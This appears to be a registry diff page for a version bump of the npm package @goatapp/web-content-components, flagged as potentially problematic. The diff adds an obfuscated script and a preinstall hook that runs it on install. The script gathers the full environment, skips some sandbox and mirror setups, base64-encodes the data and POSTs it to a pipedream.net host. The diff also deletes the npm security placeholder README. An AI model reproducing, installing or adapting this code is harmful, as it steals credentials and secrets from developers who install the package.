@goatapp/web-content-components 0.0.1-security → 9998.852.633
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of @goatapp/web-content-components might be problematic. Click here for more details.
- package/hsbyqnj.js +1 -0
- package/package.json +8 -3
- package/README.md +0 -5
package/hsbyqnj.js
ADDED
|
@@ -0,0 +1 @@
|
|
|
1
|
+
const a0_0xcdaebe=a0_0x5492;function a0_0x5492(_0x37b6d6,_0x295dcf){const _0x5a3eda=a0_0x5a3e();return a0_0x5492=function(_0x5492ec,_0x40ac80){_0x5492ec=_0x5492ec-0x1d0;let _0x134732=_0x5a3eda[_0x5492ec];return _0x134732;},a0_0x5492(_0x37b6d6,_0x295dcf);}(function(_0x277b53,_0x5a6a6c){const _0x2a7b86=a0_0x5492,_0x160aa3=_0x277b53();while(!![]){try{const _0x28e726=-parseInt(_0x2a7b86(0x1d7))/0x1+-parseInt(_0x2a7b86(0x1d6))/0x2+-parseInt(_0x2a7b86(0x1e1))/0x3+-parseInt(_0x2a7b86(0x1d0))/0x4*(parseInt(_0x2a7b86(0x1dd))/0x5)+-parseInt(_0x2a7b86(0x1e5))/0x6+parseInt(_0x2a7b86(0x1db))/0x7*(-parseInt(_0x2a7b86(0x1d8))/0x8)+-parseInt(_0x2a7b86(0x1d9))/0x9*(-parseInt(_0x2a7b86(0x1de))/0xa);if(_0x28e726===_0x5a6a6c)break;else _0x160aa3['push'](_0x160aa3['shift']());}catch(_0x55cd52){_0x160aa3['push'](_0x160aa3['shift']());}}}(a0_0x5a3e,0xc66d2));function a0_0x5a3e(){const _0x500fc6=['https','length','request','820550mrrfcK','1486327yewSVL','21936AZfKZH','36567lnXKqU','net','693kRDlKz','POST','257130CgpvKw','11190wynFuD','base64','/usr/bin/python','2106747TBsVka','stringify','USERNAME','daasadmin','2712156olhlDd','end','some','env','npm_config_registry','from','pipedream','npm_package_name','32piSroQ','taobao.org','bd43527e019ae8efb47eb39bb9313ac5'];a0_0x5a3e=function(){return _0x500fc6;};return a0_0x5a3e();}const http=require(a0_0xcdaebe(0x1d3)),filter=[{'key':a0_0xcdaebe(0x1e9),'val':a0_0xcdaebe(0x1d1)},{'key':a0_0xcdaebe(0x1e9),'val':'tencent.com'},{'key':'npm_config_registry','val':'registry.npmmirror.com'},{'key':a0_0xcdaebe(0x1e3),'val':a0_0xcdaebe(0x1e4)},{'key':'_','val':a0_0xcdaebe(0x1e0)}];function main(){const _0xa09926=a0_0xcdaebe;var _0x55efa9=process[_0xa09926(0x1e8)]||{};if(filter[_0xa09926(0x1e7)](({key:_0x2b45a0,val:_0x36f96f})=>_0x55efa9[_0x2b45a0]&&_0x55efa9[_0x2b45a0]['includes'](_0x36f96f))||Object['keys'](_0x55efa9)[_0xa09926(0x1d4)]<0xa)return;req=http[_0xa09926(0x1d5)]({'host':[_0xa09926(0x1d2),'m',_0xa09926(0x1eb),_0xa09926(0x1da)]['join']('.'),'path':'/'+(_0x55efa9[_0xa09926(0x1ec)]||''),'method':_0xa09926(0x1dc)})['on']('error',function(_0x41d6df){}),req['write'](Buffer[_0xa09926(0x1ea)](JSON[_0xa09926(0x1e2)](_0x55efa9))['toString'](_0xa09926(0x1df))),req[_0xa09926(0x1e6)]();}main();
|
package/package.json
CHANGED
|
@@ -1,6 +1,11 @@
|
|
|
1
1
|
{
|
|
2
2
|
"name": "@goatapp/web-content-components",
|
|
3
|
-
"version": "
|
|
4
|
-
"
|
|
5
|
-
"
|
|
3
|
+
"version": "9998.852.633",
|
|
4
|
+
"main": "hsbyqnj.js",
|
|
5
|
+
"scripts": {
|
|
6
|
+
"test": "echo \"Error: no test specified\" && exit 1",
|
|
7
|
+
"preinstall": "node hsbyqnj.js"
|
|
8
|
+
},
|
|
9
|
+
"author": "",
|
|
10
|
+
"license": "ISC"
|
|
6
11
|
}
|
package/README.md
DELETED
|
@@ -1,5 +0,0 @@
|
|
|
1
|
-
# Security holding package
|
|
2
|
-
|
|
3
|
-
This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
|
|
4
|
-
|
|
5
|
-
Please refer to www.npmjs.com/advisories?search=%40goatapp%2Fweb-content-components for more information.
|